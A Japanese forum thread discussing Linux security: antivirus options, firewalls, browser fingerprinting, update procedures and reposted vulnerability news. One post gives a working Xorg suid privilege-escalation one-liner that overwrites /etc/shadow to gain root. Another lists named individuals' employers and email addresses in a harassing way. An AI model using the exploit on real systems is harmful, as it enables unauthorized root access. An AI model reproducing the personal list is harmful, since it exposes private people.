Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net
Linuxを安全に使うためにセキュリティについて語りましょう! ∧,,,∧
(´・ω・) < おっかのうえひっなげしのはぁながぁぁ 〜
(U )
`u-u´ ___
(\ ∞ ノ
ヽ)_ノ 迫る〜パンチ〜〜♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .γ ⌒ ヾ
(´・ω・`) 迫る〜ハゲッ♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ∧_∧
.ミ,,・_・ミ 迫る〜ハゲッ♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ Linuxの方がWindowsよりもセキュアだっていうのは
過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね Linuxで被害出たという報告は少ないでしょ
Windowsでは散々あるけど 使う奴のスキル/知識レベル次第だから、OSが解決できる問題じゃないよ clamとかselinuxとか、皆さん使っていますか?
マシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。 他人のサーバ管理してるけど、
今までosの脆弱性突かれてどうこうてのは
無いなあ
過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ 今年も夏を乗りきれず逝く小型PCがいるのでしょうね openssl enc -e -aes256
で暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。
ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか?
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。
linux-mint(ubuntu16.04)です。 すまん誰か教えてくれ!
全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い? 。o0○( zzzz… )
_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ 【 日立製作所 】焦土戦
セキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。
新名主 隆志 TIS shimmyozu.takashi@technopro.com
色田 眞吾 日立製作所 Shikita.Shingo@technopro.com
八木 一暢 TIS yagi.kazunobu@technopro.com
水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com
佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com
佐々木 健太 日立製作所 sasaki.kenta@technopro.com
中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井 真祐子 富士ソフト nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。 誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。
グーグル検索⇒『宮本のゴウリエセレレ』
HRT6GIPYTB 。o0○( zzzz… )
_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ 僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』
BTBIK Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題w 。o0○( zzzz… )
_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ suid付きXorgを使ったroot昇格法
https://www.exploit-db.com/exploits/45697/
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ) i"\ ))
| 8 )
∧,,,∧∩-''"
_ ..(´・ω・`)彡 おぱんつ おぱんつ ! !
〃(\ ∞ ,⊂彡
`ヽ)_ノ| |
し⌒J Linuxを狙うマルウェア「HiddenWasp」に注意 2019/05/31 06:55 後藤大地
https://news.mynavi.jp/article/20190531-833791/
Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。
このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。
・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる
Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。 >>82
これはひどい
俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな
SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ? ウィルス検体を各所に送り対応が早いとこは半日だったが
ノートンは3日後だったことがあった >>83
毎日更新してるんじゃないかな
ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。 $ sudo /opt/sophos-av/bin/savupdate
次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました
$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒
と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね?
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが >>85-86
ここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた
どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい
ウイルス定義ファイル更新日もちゃんと書けよ>Sophos
Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
https://community.sophos.com/kb/ja-jp/121984 野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。 しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。
世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。 >>82
これの元記事によるとvirustotalで引っかからない
https://www.intezer.com/wp-content/uploads/2019/05/pasted-image-0-1.png
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな
↓となってるから(途中に更新あったかは知らんが多分ないだろ)
昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published> >>95
全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫 >>99
先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ
国名: 日本
都道府県:Tokyo
郵便番号:100-0000
で大丈夫だよ ブラウザでsophos.comのCookeiとJavaScriptオンにしないとだめだよ
オフになってるんじゃない? Symantec Endpoint ProtecitonmpLinux用クライアントをインストールしてみたんだが、あかんファイルは警告無く消し、しかも事後報告が無いのな
これはちと使えないわ Symantec Endpoint Protection for linux良さそうだが、
1年間9500円アップグレード4700円って高いな
ライセンスだけでメンテナンス不要版もあるの?
値段はここの43ページ
https://www.symantec.com/content/ja/jp/micro_partner/Sales_guide_SEPSPS_14_2013Feb.pdf LinuxでUEFIスキャナーがついたアンチウィルスソフトってありますか?
ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。
UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。
オープンソースで誰か作ってくれないかな・・・ マイクロソフト、Azure顧客にEximワームに注意を呼びかけ
Catalin Cimpanu (ZDNet.com) 翻訳校正: 編集部 2019年06月17日 10時47分
https://japan.zdnet.com/article/35138550/
Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の
Azureも影響を受けるとしてAzure顧客向けに警告を出した。
このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、
CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用
されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る
ことができるというものだ。
ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を
広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。
Eximはメール転送エージェント(MTA)で、Linuxベースの電子メールサーバー上で動かし
送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。
Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると
いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を
敷いているとMicrosoftは述べている。(後略) Netflix報告: Linux Kernel又はFreeBSDのリモートから攻撃可能な脆弱性(TCP SACK
PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)
2019年6月18日 05:11 Kazuki Omo
https://security.sios.com/vulnerability/misc-security-vulnerability-20190618.html
こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。
06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する
アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479,
CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに
なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート
からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。
今後も情報が出てくると思われますので、こちらで取り上げます。
逐次情報は更新していく予定です。 >>108に関連して、アップデートが大量に来ている。
また、
◆snapアプリのアップデートはaptコマンドでは不可能である。
初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。(Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ)
(1)ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。
$ sudo apt update
(2)最新の情報が取得され、システムは最新ですとの表示が出たら(4)に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。
$ sudo apt -y upgrade
ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを[Y/N]と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。
「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。
(3)次の2つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。
$ sudo apt autoremove
$ sudo apt autoclean
(4)次にsnapアプリの更新を行う。
$ sudo snap refresh
snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。
GUIからはすべてのアップデートや掃除はできない。取り分けsnapは(4)の手動アップデートでなければ更新できない。
出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。 彡⌒ミ
(,,・_・).。oO( 毛深くなりたい・・・ )
ヾ(,_uuノ >>6
それ違う
負けないためには、だね
コモドでいいよな? IntelのCPUに脆弱性 [402859164]
https://leia.5ch.net/test/read.cgi/poverty/1576065630/
供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan
https://jp.techcrunch.com/2019/12/11/2019-12-10-plundervolt-attack-breaches-chip-security-with-a-shock-to-the-system/
Plundervolt
https://plundervolt.com/
17 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 2bc5-3D6L)[sage] 投稿日:2019/12/11(水) 21:19:15.97 ID:x8hKACYL0
電圧変えて何すんのよ
システムダウン?
19 名前:番組の途中ですがアフィサイトへの転載は禁止です (ブーイモ MM39-B8XO)[sage] 投稿日:2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM
>>17
プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた
26 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa13-MFI9)[sage] 投稿日:2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a
>>17
エラーが起きたと思って秘匿領域のデータをダンプするんだってさ >>114続き
44 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ 5720-kui+)[] 投稿日:2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2]
>1>19>26
なにこれ?
PC起動してないとCPUコントロール出来ないよね?
もしかして、ハードディスク暗号化してるPCを起動して、
暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか?
>プロセッサ内で隠蔽されている暗号鍵
>秘匿領域
ここに何が格納されてるのか分からん
スーパーハッカー解説お願いします。
54 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ e228-kui+)[] 投稿日:2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0
>>44
ハードディスク暗号化してるPCを起動して、暗号化解除して使用してる最中に、
この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる
63 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa3a-0Ppm)[sage] 投稿日:2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a
>>51
電圧いじれる(管理者)権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので
UHD-BDの暗号化解除機構に使われてるんやで
55 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 5720-AQmm)[] 投稿日:2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2]
>>54
それは結構やばいなあ
まあ、暗号化解除前では意味なさそうなのが救いだな
てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの? Ubuntuアップデートしたらマイクロコード降ってきたけどこれかね
流石にそこまで早くないか MicrosoftがUbuntu用のDefender出すんだって? LinuxサーバーはAzureしか選択肢が無くなったかもかも。 iOSもカバーしてるからAzureが本命かもしれないよ。
WSLがどうでも良いわけじゃないだろうけど。 >>119
MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに
追いかけてくるってか... >>122
MSってそんな個人情報抜いてるの?
Skypeで抜いてるのにはびびったが。
あれはそこそこ信用してただけにびっくりした。
Skypeごときの情報抜かないだろうって思ってた。
MSってGoogle並みに個人情報抜いてるの?
Googleは怖くて使えんわ
あんなの住所氏名電話番号全部バレてるだろ くこの板の一部の信者はMSに親を殺された!とかわめいてるけど、実はgoogleの方がヤバいっていうね ユーザーはキンタマ握られてるから誰も言わないだけで一番ヤバいのはApple 最近はWindowsのアカウント作る時にできるだけMSアカウントを
作らせるよう誘導してくるな
Win8あたりからだった記憶があるけど、Win10が大型アップデート
するたびにどんどん露骨になってる印象 OS以外のファイルはゴッソリ抜かれてるのに
Windows10とかOffice365とか無思慮に まして仕事で使ってるヤツの気が知れんわ チョロメや考えなしに派生したクロを入れるのも
泥棒の手を引いて家ん中案内するようなもんだしね どれ使うのがええのん?
opensuseとfirefox? 俺はwinの時sandboxie上でcookieや履歴の設定をユルユルにしたfirefox使ってweb見終わったら丸消ししてたんだが
ubuntuにしてからは気軽に使えるsandboxが見当たらないんで仮想マシンにZorin LiteとFirefoxだけ入れてzipして
やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる
多少手間だが これならいくらcookieやcanvas喰おうが いつもキレーなブラウザでインターネッツできると思ったんだけどね
砂箱スレでdockerもススメられたけど dockerはなんか違うかな?と思ったわ >>130
firefoxに余計な機能をブロックするuser.jsを育てたものを使ってる
デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる…
GNUのicecat(firefox系)も良い感じ
>>131
firejail --private=<専用の一時ホームディレクトリ> とか?
canvasは個別に対応が必要だと思う >>133
user.jsは一時期手を出してみたけど「これワザとやってんじゃないの?」っていうくらい あの設定ワードって言うの?
about:configで左側に表示されるワードが 余りに頻繁に変更されるんで 根負けしてバンザイしたわ
>canvasは個別に対応が必要だと思う
とりまCanvasBlock入れてるけどOPTIONは内容が意味フで何言ってるかわかんないから手がつけられないでいるわ
やっぱ色々と設定いじった方がいいもんなの? GoogleがChromeやFirefox以外のブラウザを弾くようになって無理 つ参考
Browser Fingerprinting対策ツールの評価(pdf)
https://ipsj.ixsq.nii.ac.jp/ej/?action=repository_uri&item_id=187815&file_id=1&file_no=1
Web Browser Fingerprint解説ページ
https://www.saitolab.org/fp_site/ まじで教えてチョメ クロ 危ないんですか?
火狐は大丈夫なら 前2者は早速削除したいと思います。 Sicklylifeさんはファイアーウオールは有効にしなくてもよい
とありますので、設定していませんが、入れれば幾らかでも
安全になるのでしょうか >>138
Linux用ブラウザーを狙う奴なんていないから心配すんな。
あ、ブラウザー拡張機能は別な。拡張機能はOS問わずヤバいものがあるかもしれん。
>>139
例えばUbuntu新規インストしてupdate、dist-upgrade、rebootした後、
すぐにgufw入れてファイアーウォール有効にしても意味ないでしょ。
よく分かんないなら、とりあえずファイアーウォールは有効にしとけば? >>138
チョロメが個人情報泥棒ブラウザなのは周知の事実
何年か前からwin10にタメ張ってかなり大規模に盗みやってるらしいゾ
Win版のチョロはアンインストールしても 泥棒機能はOSの深いトコで生き続けるらしいから
もし無しにしたいのならOSの入れ直ししかねーんじゃね?
そんでせっかく金使って開発した泥棒機能をLinux版には入れていないなんて甘い見通しは無いと思うが?
ゴキグルから見たらwinユーザーもLinuxユーザーも同じ金だろうに
クロムもソースからゴキグルと通信する部分を削除していないのはアウトだと思っていーんじゃね? >>139
セキュリティは上がる、とは言える
最初はgufw,慣れればiptablesがおすすめ(FWというかネットワークの詳細なコントロールが出来る)
例えばFW無しだと、WANインターフェイスか0.0.0.0でリッスン中のプロセスがあれば外から繋がる
これが設定ミスや脆弱性から悪用に発展する可能性、どんなプログラムを走らせてるのかバレる、DOSの可能性
ルーターの内側に居ればベーシックなFWの内側に居るのに近いけど、アプリがUPnPで勝手にルーターでポートを開ける事も無理じゃない
LAN内の相手からは普通に繋がるし、必ずしもルーターの内側にいるのか?リッスン中のアプリに設定ミスや脆弱性は無いのか?
FWはそういう可能性をカット出来る(公開する意図のない宛先には)
不要なアタックサーフェイスは狭めるのがセキュリティの基本 小手先だけで、基礎の教養なしにubuntu を使っている小生には
ほとんど判りませんが、兎に角拡張機能は避ける、fireWallは有効にしてみました、
ご教示有難う存じました。 >>134-135
Canvasってなんだっけ?
CanvasってJavaScriptオフだと機能しないよね?
俺の勘違い? Ubuntu18.04使用でブラウザはFirefox、Torbrowserしか入れてないわ
Chromeは論外で他に選択しないからこの2つ以外入れてない
Torスレでもなんか話題になってたけど、
普通のブラウジングするのにTorbrowserのTor機能だけ切るのはどうなの?
TorBrowserもFirefox基盤だけど、
>>133の
>デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる…
にはなってないよね?
なにせTorBrowserだし・・・ >>131
>ubuntuにしてからは気軽に使えるsandboxが見当たらないんで
>仮想マシンにZorin LiteとFirefoxだけ入れてzipして
>やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる
なんでこんなめんどくさいことしてるの?
普通にFirefoxの全履歴削除すれば全部消えるんじゃないの?
UbuntuのJournalに履歴とか残るから? iptablesはもう古いよ
これからはnftablesだよ Oracle Linux の SELinux を disabled にしたら SSH で接続できなくなるのはなぜですか? >>144
ここで言ってるのはfingerprinting技術
WEBにアクセスした時に、環境ごとにユニークな値を生成させて取得(同時にIPや他情報もなるべく取得)
その後IPを変えようがcookieやら消そうが同じようなユニークな値を取って紐付ければ特定に繋がる
ブラウザだとcanvas,audio,rectその他がフィンガープリントするのに使えるらしい
こんな追跡の仕方、技術の悪用に近いと思うけど…、色んな建前を使って取得&追跡されるのが常だからな
JSを切ればcanvasでは取れないような…?他もかなり良くなる
>>145
利便性とのバランスもあるけど、プライバシー重視なら俺もTor切ったTorBrowserは手っ取り早いと思う
プロ?集団がプライバシー重視でアンチフィンガープリンティングにも力を入れて設定&開発したんだ
公式でTor無しバージョンもリリースすれば良いのに
もちろんGやテレメトリその他色々無効になってる(about:configで確認出来る) 無料ウイルス対策ソフトのアバストAvast、おまえらのネット閲覧データを販売か? [594632409]
https://leia.5ch.net/test/read.cgi/poverty/1580177900/
無料ウイルス対策ソフトのアバスト、ユーザーのウェブ閲覧データを販売か
Carrie Mihalcik (CNET News) 翻訳校正: 編集部2020年01月28日 11時07分
ウィルス対策ソフトウェアメーカーAvastが、Jumpshotという子会社を通して「機密性の高い」ウェブ閲覧データを販売していると報じられている。
https://japan.cnet.com/article/35148566/